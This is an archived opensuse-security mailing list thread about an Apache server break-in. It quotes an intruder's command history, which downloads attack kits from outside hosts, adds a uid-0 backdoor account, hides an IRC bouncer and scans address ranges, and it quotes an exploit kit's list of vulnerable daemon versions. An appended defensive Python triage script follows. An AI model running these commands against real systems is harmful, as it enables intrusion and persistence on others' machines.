Mailinglist Archive: opensuse-security (334 mails)

Re: [suse-security] Apache Gain Remote Shell Access
quote from "boom.tar.gz" (see if you find somethin' that sounds familiar):

WARNING, this is a powerful tool, you can gain root access on many systems.

Use it at your own risk.

It scans for vulnerabilities in different OS and daemons:

The BIND scan:

Gains root access on all nonpatched boxes running linux with the following
bind versions:

ISC BIND 8.2
ISC BIND 8.2.1
ISC BIND 8.2.2
ISC BIND 8.2.2-P3
ISC BIND 8.2.2-P5
ISC BIND 8.2.2-P7

The LPD scan:

Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd
from distribution.

The FTPD scan:

Gains root access on all nonpatched boxes running the following OS/ftp
daemons:

Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
Debian potato [wu-ftpd_2.6.0-3.deb]
Debian potato [wu-ftpd_2.6.0-5.1.deb]
Debian potato [wu-ftpd_2.6.0-5.3.deb]
Debian sid [wu-ftpd_2.6.1-5_i386.deb]
Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
SuSE 7.0 [wuftpd.rpm]
SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
SuSE 7.1 [wuftpd.rpm]
SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
SuSE 7.2 [wuftpd.rpm]
SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
SuSE 7.3 [wuftpd.rpm]
SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
Slackware 7.1

The SSHD scan:

Gains root access on all nonpatched boxes running the following versions:

Linux:

SSH-1.5-1.2.25
SSH-1.5-1.2.26
SSH-1.5-1.2.27
SSH-1.5-1.2.30
SSH-1.5-1.2.31
SSH-1.99-OpenSSH_2.2.0p1
SSH-1.5-OpenSSH-1.2
SSH-1.5-OpenSSH-1.2.2
SSH-1.5-OpenSSH-1.2.3

OpenBSD 3.x:

OpenSSH 2.9.9 - 33

The RPC scan:

Gains root access on multiple RPC vulnerabilities involving
Linux/SunOS/Solaris.

The TELNETD scan:

Gains root access on all nonpatched boxes running the following OSes:

Most of the BSD OSes

The POP3 scan:

Gains root access on all nonpatched boxes running QPOP 3.0b

For further upgrades send me new exploits at k1net1c@xxxxxxxxxxx

The SSL scan:

Gains access on almost all linux boxes running OpenSSL 0.9.6d and older.

Spawns a shell uid=apache.



----- Original Message -----
From: "Radu Voicu" <suse@xxxxxxxxxxxxxxxxxx>
To: "Marco Lum" <marco@xxxxxxxxxxxxx>; "suse-security"
<suse-security@xxxxxxxx>
Sent: Wednesday, September 03, 2003 7:53 PM
Subject: Re: [suse-security] Apache Gain Remote Shell Access


> curiosity kills the cat:
>
> http://www.vulturul.org/ = A Romanian guy, 18 years old, his name is Brisan
> Andrei :)
>
>
>
> ----- Original Message -----
> From: "Marco Lum" <marco@xxxxxxxxxxxxx>
> To: "suse-security" <suse-security@xxxxxxxx>
> Sent: Wednesday, September 03, 2003 7:43 PM
> Subject: [suse-security] Apache Gain Remote Shell Access
>
>
> > Help, help, somebody help!!!
> >
> > I found somebody gained access using wwwrun, downloaded programs and tried to
> > hack into other servers.
> >
> > The following was found in the Apache error_log:
> >
> > --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
> > => `vulturu.tgz'
> > Resolving www.vulturul.org... done.
> > Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 9,432 [application/x-tar]
> >
> > 0K ......... 100%
> > 13.69 KB/s
> >
> > 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
> >
> >
> > bind: Address already in use
> > bind: Address already in use
> > --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz
> > => `bin.tar.gz'
> > Resolving geocities.com... done.
> > Connecting to geocities.com[66.218.77.68]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 19,748 [application/x-gzip]
> >
> > 0K .......... ......... 100%
> > 65.37 KB/s
> >
> > 09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
> >
> > sh: line 1: ./bin.tar.gz: Permission denied
> >
> > gzip: stdin: not in gzip format
> > tar: Child returned status 1
> > --15:50:22-- http://195.174.78.202/a.out
> > => `a.out'
> > Resolving 195.174.78.202... done.
> > Connecting to 195.174.78.202:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 13,444 [text/plain]
> >
> > 0K .......... ... 100%
> > 3.37 KB/s
> >
> > 15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
> >
> > sh: line 1: ./a.out: Permission denied
> > chmod: invalid mode string: `x'
> > sh: line 1: ./a.out: Permission denied
> > Bad syntax, perhaps a bogus '-'?
> >
> > sh: line 1: cd: /tmp/vulturu: No such file or directory
> > --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz
> > => `vulturu.tgz'
> > Resolving www.vulturul.org... done.
> > Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 9,432 [application/x-tar]
> >
> > 0K ......... 100%
> > 13.67 KB/s
> >
> > 20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
> >
> >
> > tar: Error exit delayed from previous errors
> >
> > sh: line 1: cd: /tmp/": No such file or directory
> >
> >
> > Also found his command history:
> >
> >
> > id
> > /usr/sbin/adduser vulturul -u0 -g0 -M;
> > cd /usr/local/games/
> > ls -ax
> > wget www.vulturul.org/vulturul/bnc.tgz
> > cd /tmp/" "
> > socklist
> > killall -9 nsl
> > ls -ax
> > rm -rf epcs2
> > rm -rf ns
> > rm -rf nsl
> > rm -rf p
> > rm -rf pk
> > ls -ax
> > wget www.vulturul.org/vulturul/bnc.tgz
> > tar xvfz bnc.tgz
> > mv psybnc "~. "
> > cd "~. "
> > mv psybnc " "
> > export PATH=:PATH
> > ./" "
> > id
> > ls --color
> > ./li
> > ls --color
> > ./p
> > exec ./p 8003
> > id
> > pwd
> > cd ..
> > cd ..
> > ls -ax
> > ls -ax --color
> > rm -rf edu.gz
> > rm -rf local.tar.gz
> > rm -rf local
> > cd 3du
> > ls --color
> > ls --color
> > ./scan 200.13.230.37
> > ./scan 200.13.230.37 -d 6
> > ./scan 202.30.198.226 -d 6
> > /scan 202.186.250.157
> > ./scan
> > ./scan 202.186.250.157
> > ./scan 202.186.250.157 -d 6
> > ./scan 64.106.104.84 -d 6
> > ./scan 64.106.104.84 -d 6
> > ./scan 128.119.213.136 -d 2
> > d ..
> > cd ..
> > ls -ax
> > cd atd
> > ls -ax
> > ./osslmass2 mass.log
> > ./osslmass2 mass.log
> > cd ../atd
> > ls -ax
> > cd ..
> > ls -ax --color
> > pico
> > ./pico
> > mv pico /usr/bin
> > pico
> > ls -ax
> > mv pico /usr/bin
> > cp pico /usr/bin/pico
> > cd 3du
> > ls -ax --color
> > cd ..
> > wget http://geocities.com/supers7ar/boom.tar.gz
> > tar xvfz boom.tar.gz
> > cd boom
> > ls -ax
> > ./r00t
> > ./r00t -t 193.231.142 -d 3
> > ./r00t -t 193.231.142 -d 2
> > ./r00t -t 193.231.142 -d 4
> > ./r00t -t 193.231.142 -d 7
> > ./r00t -t 193.231.142 -d 8
> > cd ..
> > pwd
> > wget http://geocities.com/supers7ar/sshup.tar.gz
> > tar xvfz sshup.tar.gz
> > cd ssh-3.0.1/
> > ls -ax
> > cd ..
> > rm -rf ssh-3.0.1/
> > rm -rf sshup.tar.gz
> > ls -ax --color
> > rm -rf boom.tar.gz
> > cd ~.
> > cd " ~.
> >
> > q
> >
> > q
> >
> > }
> >
> > q
> >
> > exit
> >
> > ls -ax
> > wget www.vulturul.org/vulturul/linsniffer
> > chmod +x linsniffer
> > ./linsniffer
> > ls -ax
> > rm -rf linsniffer
> > ls -ax --color
> > id
> > ./heh
> >
> > ./r00t -t 128.100.20 -d 8
> > ./r00t -t 193.231.142 -d 3
> > ./r00t -t 193.231.142 -d 2
> >
> > ./scan 200.13.230.37
> >
> > Please help, I can't find where he got in!
> >
> > --
> > Marco Lum
> > Net Service Manager
> >
> >
>
> > ___________________________________________________________________________________________
> > System Development Service
> > Inter/Intra/Local-Area Networking Service
> >
> > VOICE: +852 2851 1190
> > FAX : +852 2851 1109
> > Email: enquiry@xxxxxxxxxxxxx
> > WWWeb: http://www.hkservice.com
> >
> > HK Service Company
> > HK Service Consultants Limited
> >
> >
> >
> >
> > --
> > Check the headers for your unsubscription address
> > For additional commands, e-mail: suse-security-help@xxxxxxxx
> > Security-related bug reports go to security@xxxxxxx, not here
> >
> >
>

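Added example, not code from any of the posters above: a small Python triage script for the kind of evidence Marco posted. It pairs the wget start and "saved" lines in the error_log excerpt (wget writes progress to stderr, and a shell spawned inside Apache inherits the server's error_log as stderr, which is why the downloads show up there at all), lists the `sh: line N:` failures, checks /etc/passwd for the extra uid 0 account that the history's `adduser vulturul -u0 -g0 -M` would leave behind, and flags directory names made of spaces, dots and quotes like the `" "` and `"~. "` that psybnc was moved into. The log lines, passwd lines and directory names below are constructed from the thread's own excerpt; the function and constant names are my own.

```python
"""Triage helpers for a web-server-user compromise of the kind described in the thread.

Constructed sample inputs (modelled on the quoted error_log and command history)
are embedded so the script runs offline; feed the functions real files to use them.
"""
import re

# Constructed sample: error_log lines modelled on the excerpt quoted in the thread.
SAMPLE_ERROR_LOG = """\
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
=> `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use
--09:33:57-- http://geocities.com/supers7ar/bin.tar.gz
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format
--15:50:22-- http://195.174.78.202/a.out
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied
"""

# Constructed sample /etc/passwd: root, the SuSE Apache user, and the account that
# `adduser vulturul -u0 -g0 -M` from the posted history would create.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
vulturul:x:0:0::/home/vulturul:/bin/bash
"""

# Constructed sample directory listing: the names the history shows psybnc hidden under.
SAMPLE_NAMES = ["3du", "atd", " ", "~. ", "boom", '"']

WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"^(\d\d:\d\d:\d\d) .*?`([^']+)' saved \[(\d+)/(\d+)\]")
SHELL_ERR = re.compile(r"^sh: line \d+: (.+)$")


def wget_downloads(log_text):
    """Pair each wget start line with the 'saved' line that completes it."""
    downloads = []
    for line in log_text.splitlines():
        m = WGET_START.match(line)
        if m:
            downloads.append({"started": m.group(1), "url": m.group(2),
                              "file": None, "bytes": None})
            continue
        m = WGET_SAVED.match(line)
        if m and downloads and downloads[-1]["file"] is None:
            downloads[-1]["file"] = m.group(2)
            downloads[-1]["bytes"] = int(m.group(3))
    return downloads


def shell_errors(log_text):
    """Commands the attacker's shell reported as failing (e.g. executing a tarball)."""
    return [m.group(1) for m in map(SHELL_ERR.match, log_text.splitlines()) if m]


def extra_uid0_accounts(passwd_text):
    """Every account besides root with uid 0: a second root login is a classic backdoor."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def suspicious_names(names):
    """Names meant to hide in `ls`: only whitespace, dot-and-space, or containing a quote."""
    flagged = []
    for name in names:
        stripped = name.strip()
        if stripped in ("", ".", "~.") or '"' in name or name != stripped:
            flagged.append(name)
    return flagged


def triage(log_text=SAMPLE_ERROR_LOG, passwd_text=SAMPLE_PASSWD, names=SAMPLE_NAMES):
    """Collect all indicators in one dict so a responder can print or diff them."""
    return {
        "downloads": wget_downloads(log_text),
        "shell_errors": shell_errors(log_text),
        "uid0_accounts": extra_uid0_accounts(passwd_text),
        "hidden_names": suspicious_names(names),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key)
        for item in value:
            print("   ", item)
```

On a real host, pass the functions the actual error_log, /etc/passwd and the `os.listdir()` of /tmp and every directory the web-server user can write to. Note what the history itself implies: `adduser` only succeeds as root, so if the uid 0 account is present the box was fully rooted, not just the wwwrun user, and the sensible response is to rebuild from clean media rather than delete the attacker's files.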

